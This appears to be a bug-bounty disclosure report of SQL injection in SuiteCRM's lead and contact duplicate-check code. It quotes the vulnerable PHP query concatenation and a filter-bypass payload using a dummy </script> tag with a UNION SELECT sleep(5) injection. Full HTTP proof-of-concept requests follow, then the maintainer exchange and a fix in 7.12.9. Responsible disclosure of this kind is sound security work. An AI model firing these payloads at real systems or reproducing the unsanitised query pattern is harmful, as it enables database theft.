Multiple SQL Injections in salesagility/suitecrm

Valid

Reported on

Oct 9th 2022

Description

User input is inserted directly into a SQL query in multiple places when duplicating contacts/leads.

Proof of Concept

For a PoC, we are going to use Leads, although the other vulnerabilities will (probably) work analagously. Since the input is not directly displayed to the user, we will proof SQL Injection by inserting a SLEEP command.

The vulnerable code is found here:

$query = "SELECT id, first_name, last_name, account_name, title FROM leads ";
$query .= " WHERE deleted != 1 AND (status <> 'Converted' OR status IS NULL) AND ";

if (isset($_POST[$prefix.'first_name']) && strlen($_POST[$prefix.'first_name']) != 0 && isset($_POST[$prefix.'last_name']) && strlen($_POST[$prefix.'last_name']) != 0) {
    $query .= " (first_name='". $_POST[$prefix.'first_name'] . "' AND last_name = '". $_POST[$prefix.'last_name'] ."')";
} else {
    $query .= " last_name = '". $_POST[$prefix.'last_name'] ."'";
}

return $query;

In order to break out of the string, we need to insert a single-quote. However, single-quotes are HTML-entity encoded. The XSS filter can be tricked into injecting an unencoded single-quote by inserting a dummy </script> tag that is removed by the filter. The payload inserted into the last_name parameter looks like this: asd</script>') UNION SELECT sleep(5),2,3,4,5 -- -.

PoC Requests

This is a PoC request (for SuiteCRM Version 7.12.7):

POST /index.php HTTP/1.1
Host: 127.0.0.1:8001
Content-Length: 484
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIInRESOo76zAzDIg
Referer: http://127.0.0.1:8001/index.php
Cookie: PHPSESSID=bjim2jhhk5dobsulut6gj4s9kt
Connection: close

------WebKitFormBoundaryIInRESOo76zAzDIg
Content-Disposition: form-data; name="module"

Leads
------WebKitFormBoundaryIInRESOo76zAzDIg
Content-Disposition: form-data; name="action"

Save
------WebKitFormBoundaryIInRESOo76zAzDIg
Content-Disposition: form-data; name="first_name"

asd
------WebKitFormBoundaryIInRESOo76zAzDIg
Content-Disposition: form-data; name="last_name"

asd</script>') UNION SELECT sleep(5),2,3,4,5 -- -
------WebKitFormBoundaryIInRESOo76zAzDIg--

SuiteCRM 8.1.3 is also vulnerable via the legacy code. The PoC request needs to be adjusted a bit (the path needs to be adjusted & the LEGACYSESSID cookie is required):

POST /legacy/index.php HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 484
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIInRESOo76zAzDIg
Referer: http://127.0.0.1:8001/index.php
Cookie: LEGACYSESSID=6cskbp5agsnaa83t4eld5gb03a; PHPSESSID=3eip2m4qvk131iob0dide5uh7st
Connection: close

------WebKitFormBoundaryIInRESOo76zAzDIg
Content-Disposition: form-data; name="module"

Leads
------WebKitFormBoundaryIInRESOo76zAzDIg
Content-Disposition: form-data; name="action"

Save
------WebKitFormBoundaryIInRESOo76zAzDIg
Content-Disposition: form-data; name="first_name"

asd
------WebKitFormBoundaryIInRESOo76zAzDIg
Content-Disposition: form-data; name="last_name"

asd</script>') UNION SELECT sleep(5),2,3,4,5 -- -
------WebKitFormBoundaryIInRESOo76zAzDIg--

The response takes approximately 5 seconds, proving that the SLEEP statement was executed by the database and thus we have SQL Injection.

Impact

The impact is leakage of all data stored in the database.

Occurrences

User Input should not be inserted into a SQL query without sanitization.

User Input should not be inserted into a SQL query without sanitization.

User Input should not be inserted into a SQL query without sanitization.

We are processing your report and will contact the salesagility/suitecrm team within 24 hours. a year ago
We have contacted a member of the salesagility/suitecrm team and are waiting to hear back a year ago
Jack Anderson
a year ago

Hi Vautia,

Thank you for your Security Report.

We have raised the issue from this report with our internal security team to be confirmed.

Below is a reference of the issue raised and ID allocated:

  • SCRMBT-#211 - Multiple SQL Injections when duplicating Leads/ Contacts

We will review the issue and confirm if it is a vulnerability within SuiteCRM and meets our criteria for a Security issue. If an issue is not considered a Security issue or that it does not need to be private then we'll raise it via the GitHub bug tracker or a more appropriate place.

Thank you for your contribution to the SuiteCRM project.

We have sent a follow up to the salesagility/suitecrm team. We will try again in 7 days. a year ago
We have sent a second follow up to the salesagility/suitecrm team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the salesagility/suitecrm team. This report is now considered stale. a year ago
vautia
a year ago

Researcher

Hi @maintainer, is there any update on this report?

Pavlos validated this vulnerability 7 months ago
vautia has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Pavlos marked this as fixed in 7.12.9 with commit c19f22 7 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Pavlos published this vulnerability 7 months ago
ProspectFormBase.php#L63-L97 has been validated
LeadFormBase.php#L63-L76 has been validated
ContactFormBase.php#L71-L86 has been validated
to join this conversation